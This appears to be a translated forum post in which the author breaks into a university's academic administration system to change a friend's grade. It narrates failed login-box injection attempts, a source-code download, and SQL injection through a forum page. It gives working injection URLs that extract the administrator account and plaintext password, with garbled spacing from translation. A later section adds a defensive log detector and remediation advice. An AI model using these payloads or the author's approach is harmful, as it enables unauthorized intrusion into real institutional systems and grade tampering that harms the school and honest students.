Yesterday I went to the academic affairs office of a friend's university and looked at it. I thought maybe I could help him change his score.
I think it's a strong smart technology educational administration system.
Googling turned up a vulnerability: POST injection in the login box, with an MSSQL database.
I tried it. I don't know where the problem is. I tried several tools and couldn't read the table names. sa is displayed, but xp_cmdshell failed to be restored. Execution of the command failed.
Instead, I put it into Jsky for a scan and, surprisingly, found that the website's source code could be downloaded.
I found that the educational administration system includes a very poor BBS. Basically, no one logs on to the BBS. By default its administrator password is the same as the educational administration administrator password, but it is stored in plain text in another table.
This is amazing.
Register a user on the forum.
Then manually inject to get the password of the administrator account.
Smooth access to the admin backend.
I can really change my score
Expose this vulnerability.
Register first at this location: Gl/bbs/default.asp, then open http://www.xxxx.com/JwGl/bbs/viewuser.asp?Name=sudo (change sudo to your registered user name)
Http://www.xxx.com/JwGl/bbs/viewuser.asp? Name = sudo 'and % 201 = convert (int, (select % 20top % 201% 20SFAdmin_Account % 20 from % 20 SFadmin) -- get the Administrator account
Http://www.xxx.com/JwGl/bbs/viewuser.asp? Name = sudo 'and % 201 = convert (int, (select % 20top % 201% 20SFAdmin_Password % 20 from % 20 SFadmin) -- get the Administrator Password
Login interface: http://www.bkjia.com/megagl/
Solution: many cattle
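
For administrators of an affected site, the viewuser.asp requests described above leave a recognizable trace in the web server log. The following is an added example, not part of the original post: a small detector for the convert(int, (select ...)) probe in the Name parameter. The log layout, IP addresses and the col/tbl names are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl

# Constructed log lines in a simplified IIS W3C layout (assumed field order):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2024-03-01 09:14:02 198.51.100.7 GET /JwGl/bbs/viewuser.asp Name=alice 200
2024-03-01 09:14:30 198.51.100.7 GET /JwGl/bbs/viewuser.asp Name=o'brien 200
2024-03-01 09:15:11 203.0.113.9 GET /JwGl/bbs/viewuser.asp Name=sudo'%20and%201=convert(int,(select%20top%201%20col%20from%20tbl))-- 500
2024-03-01 09:15:40 203.0.113.9 GET /JwGl/bbs/viewuser.asp Name=sudo'+AND+1=CONVERT(INT,(SELECT+TOP+1+col+FROM+tbl))-- 500
2024-03-01 09:16:05 198.51.100.7 GET /JwGl/bbs/default.asp - 200
"""

# A subquery forced through convert(int, ...) makes MSSQL put the selected
# string into its conversion error message; that is the probe to look for.
CAST_PROBE = re.compile(r"convert\s*\(\s*int\s*,\s*\(?\s*select\b", re.I)
COMMENT = re.compile(r"--|/\*")


def classify(value):
    """Return the reasons a decoded parameter value looks like an injection probe."""
    reasons = []
    if CAST_PROBE.search(value):
        reasons.append("convert-int-subquery")
    # A lone quote is common in real names (o'brien); require a comment marker too.
    if "'" in value and COMMENT.search(value):
        reasons.append("quote-plus-comment")
    return reasons


def scan(log_text, page="/jwgl/bbs/viewuser.asp"):
    """Yield (client_ip, parameter, reasons, got_500) for suspicious requests."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) != 7:
            continue  # skip W3C header lines and malformed rows
        _, _, ip, _, stem, query, status = fields
        if stem.lower() != page or query == "-":
            continue
        # parse_qsl percent-decodes and turns '+' into spaces before matching.
        for param, value in parse_qsl(query, keep_blank_values=True):
            reasons = classify(value)
            if reasons:
                # A 500 here suggests the database error was returned to the client.
                findings.append((ip, param, reasons, status == "500"))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Detection only shows that the probe was attempted; the fix on the application side is to bind Name as a query parameter instead of concatenating it into the SQL string, to stop returning database errors to the browser, and to stop storing the administrator password in plain text.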